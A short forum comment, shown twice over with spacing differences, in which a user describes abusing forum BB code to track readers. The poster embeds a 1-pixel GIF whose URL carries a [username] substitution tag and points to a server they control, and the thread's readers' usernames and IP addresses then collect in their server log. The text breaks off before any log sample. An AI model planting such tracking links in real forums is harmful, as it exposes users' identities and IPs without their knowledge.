I think some forums turned it off rather than figure out how to secure it lol, when forum users can embed the "replace with username" string in their posts.
Whenever there was a [username] BB code on some forum, there would almost always also be [image] for embedding images. I still find this exploit in forums to this day occasionally, where you can embed a link to a 1 px GIF in your post, with the url like this: https://server-i-control.tld/image.gif?u=[username] and then my web server log starts filling up with username + IP combos of people viewing the thread like:
I think some forums turned it off rather than figure out how to secure it lol, when forum users can embed the "replace with username" string in their posts.
Whenever there was a
[username]BB code on some forum, there would almost always also be[image]for embedding images. I still find this exploit in forums to this day occasionally, where you can embed a link to a 1 px GIF in your post, with the url like this:https://server-i-control.tld/image.gif?u=[username]and then my web server log starts filling up with username + IP combos of people viewing the thread like: